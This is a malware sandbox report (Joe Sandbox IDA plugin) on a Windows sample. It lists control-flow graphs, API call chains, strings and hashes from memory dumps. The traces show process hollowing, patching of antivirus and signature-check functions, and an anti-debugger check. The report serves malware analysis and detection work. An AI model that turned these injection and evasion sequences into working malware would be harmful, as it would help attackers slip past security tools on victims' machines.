2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64de0 call 2e64df0 call 2e78788 6918->6962 7071 2e79277-2e792e3 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 6962->7071 7072 2e792e8-2e79609 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e62ee0 call 2e62f08 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2e7960f-2e79872 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78400 7072->7180 7253 2e79b7f-2e79bea call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 7180->7253 7254 2e79878-2e799e1 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78670 7180->7254 7279 2e79bf0-2e79d70 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77a2c 7253->7279 7280 2e79beb call 2e789d0 7253->7280 7344 2e799e3-2e79a09 call 2e77a2c 7254->7344 7345 2e79a0b-2e79a76 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 7254->7345 7279->6917 7384 2e79d76-2e79e6f call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e78c80 7279->7384 7280->7279 7354 2e79a7c-2e79b7d call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77a2c 7344->7354 7345->7354 7385 2e79a77 call 2e789d0 7345->7385 7354->7279 7436 2e79ec3-2e7a8b2 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77d78 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e77d78 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 SetThreadContext NtResumeThread call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e62c2c call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7894c * 3 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e7894c * 2 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c * 5 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e78080 call 2e7894c * 2 7384->7436 7437 2e79e71-2e79ebe call 2e78b78 call 2e78b6c 7384->7437 7385->7354 7436->6917 7437->7436
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                    • Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814
                                                                                                                  • GetThreadContext.KERNEL32(00000894,02EE7424,ScanString,02EE73A8,02E7A93C,UacInitialize,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,UacInitialize,02EE73A8), ref: 02E79602
                                                                                                                    • Part of subcall function 02E78400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E78471
                                                                                                                    • Part of subcall function 02E78670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E786D5
                                                                                                                    • Part of subcall function 02E77A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 3386062106-51457883
                                                                                                                  • Opcode ID: de31e5f11def10e8cc1418ce95167219e531431cf8b469e366b78976958e2496
                                                                                                                  • Instruction ID: e9a352b62a0e665617f73402bae841510302b14ce6841249527b3342463d566e
                                                                                                                  • Opcode Fuzzy Hash: de31e5f11def10e8cc1418ce95167219e531431cf8b469e366b78976958e2496
                                                                                                                  • Instruction Fuzzy Hash: C7E21234AC01189BDB21FB64EC89BDE73B6AF95340F50E1B1B009AB354DA70AE95CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 10945 2e65acc-2e65b0d GetModuleFileNameA RegOpenKeyExA 10946 2e65b4f-2e65b92 call 2e65908 RegQueryValueExA 10945->10946 10947 2e65b0f-2e65b2b RegOpenKeyExA 10945->10947 10952 2e65bb6-2e65bd0 RegCloseKey 10946->10952 10953 2e65b94-2e65bb0 RegQueryValueExA 10946->10953 10947->10946 10948 2e65b2d-2e65b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2e65bd8-2e65c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2e65cf2-2e65cf9 10950->10954 10955 2e65c0f-2e65c13 10950->10955 10953->10952 10956 2e65bb2 10953->10956 10958 2e65c15-2e65c19 10955->10958 10959 2e65c1f-2e65c35 lstrlenA 10955->10959 10956->10952 10958->10954 10958->10959 10960 2e65c38-2e65c3b 10959->10960 10961 2e65c47-2e65c4f 10960->10961 10962 2e65c3d-2e65c45 10960->10962 10961->10954 10964 2e65c55-2e65c5a 10961->10964 10962->10961 10963 2e65c37 10962->10963 10963->10960 10965 2e65c84-2e65c86 10964->10965 10966 2e65c5c-2e65c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10954 10967 2e65c88-2e65c8c 10965->10967 10966->10965 10967->10954 10968 2e65c8e-2e65cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2e65cc0-2e65cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E60000,02E8E790), ref: 02E65AE8
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B06
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B24
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E65B42
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E65B8B
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,02E65D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001), ref: 02E65BA9
                                                                                                                  • RegCloseKey.ADVAPI32(?,02E65BD8,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E65BCB
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E65BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E65BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E65BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E65C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E65CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E65CB5
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E65CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E65CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                  • Opcode ID: 3c14eb29dc6cbec2f391f6734a9bed9ca1165bf574947270b57627676bc1114f
                                                                                                                  • Instruction ID: bed1e146198926d4ae6d58c400d7336167a2a8252f52faf5a9de5fbbe21a79f4
                                                                                                                  • Opcode Fuzzy Hash: 3c14eb29dc6cbec2f391f6734a9bed9ca1165bf574947270b57627676bc1114f
                                                                                                                  • Instruction Fuzzy Hash: FD519571BC025D7AFB21D6A48C4EFFF77AD9B047C4F8091A1BA08E6181DB749A449F60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13205 2e7894c-2e78971 LoadLibraryW 13206 2e78973-2e7898b GetProcAddress 13205->13206 13207 2e789bb-2e789c1 13205->13207 13208 2e789b0-2e789b6 FreeLibrary 13206->13208 13209 2e7898d-2e789ac call 2e77d78 13206->13209 13208->13207 13209->13208 13212 2e789ae 13209->13212 13212->13208
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6
                                                                                                                    • Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                  • Opcode ID: 393a169d52eaa69cc42fd13efc7fc61ce8d61ba4787d14b1a5409b723b0cd0a4
                                                                                                                  • Instruction ID: 559d385ae1447991a44a194ac65f3c4abe67276eee3e484fdbc815316e9d6da8
                                                                                                                  • Opcode Fuzzy Hash: 393a169d52eaa69cc42fd13efc7fc61ce8d61ba4787d14b1a5409b723b0cd0a4
                                                                                                                  • Instruction Fuzzy Hash: 16F0FF70AC0304DEEB90A76AB84CF67B7AC9391714F405929B90C8B144C2B41C908B50

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13222 2e7f744-2e7f75e GetModuleHandleW 13223 2e7f760-2e7f772 GetProcAddress 13222->13223 13224 2e7f78a-2e7f792 13222->13224 13223->13224 13225 2e7f774-2e7f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2e7f786 13225->13226 13226->13224
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02E7F754
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E7F766
                                                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E7F77D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                  • API String ID: 35162468-539270669
                                                                                                                  • Opcode ID: 0660eb77788358bb9a4d6e1deafb4129ebe958e8b4fc85d108f6834f2f4d143c
                                                                                                                  • Instruction ID: d94bd6b1f3adb6ecbe8ee80cedd2c1abc26e467399cca86d7608996d54ec77c5
                                                                                                                  • Opcode Fuzzy Hash: 0660eb77788358bb9a4d6e1deafb4129ebe958e8b4fc85d108f6834f2f4d143c
                                                                                                                  • Instruction Fuzzy Hash: 60F0A770994248BAEB10A7B888887ECFBA95B05328F249394E435625C1E7750640CA51

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDAB
                                                                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E7DE40), ref: 02E7DDDB
                                                                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E7DDF0
                                                                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E7DE1C
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E7DE25
                                                                                                                    • Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1897104825-0
                                                                                                                  • Opcode ID: f65ab1a814eefb03b73bc06ea299b74d62557a0768b316d571b4b76f3cb3230a
                                                                                                                  • Instruction ID: e7743acd81e0254b3569d1f3f9c44e81f0a2cfcb5ff67ac687d08cdc8c1be9be
                                                                                                                  • Opcode Fuzzy Hash: f65ab1a814eefb03b73bc06ea299b74d62557a0768b316d571b4b76f3cb3230a
                                                                                                                  • Instruction Fuzzy Hash: 5C21C175AC0309BAEB51EAD4CC56FDE77BDEB48700F505461B600F71C0DAB4AA059BA4

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E7E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 98fe4e802d5c1ca760e6169db9e8c7d69538ebc641d3e18501033328bc2f3fab
                                                                                                                  • Instruction ID: b1f1600c67b01c009c22a41c99c94cfb626bee730a6506d95ce89f2b634a42bf
                                                                                                                  • Opcode Fuzzy Hash: 98fe4e802d5c1ca760e6169db9e8c7d69538ebc641d3e18501033328bc2f3fab
                                                                                                                  • Instruction Fuzzy Hash: 51412135BC01099BEB21EBA4D845EEEB3FAEF89740F60E465F041A7291DA70AD018F55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E64F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E64F2E
                                                                                                                  • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
                                                                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
                                                                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
                                                                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3764614163-0
                                                                                                                  • Opcode ID: 650641e99ecdfd4c01168b99579bc376d9ea1f9d2d36b95c02845ca57dd5d4ac
                                                                                                                  • Instruction ID: e1e5136442c70e8e653a919a1795d0712ae4208e25cf0c6e2d0e6fbe5c4e9a45
                                                                                                                  • Opcode Fuzzy Hash: 650641e99ecdfd4c01168b99579bc376d9ea1f9d2d36b95c02845ca57dd5d4ac
                                                                                                                  • Instruction Fuzzy Hash: 3821E071AC0209BAEB20EAD0CD56FEEB7BDEF05B40F619561B600F75C0D7B06A049B64
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E77A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
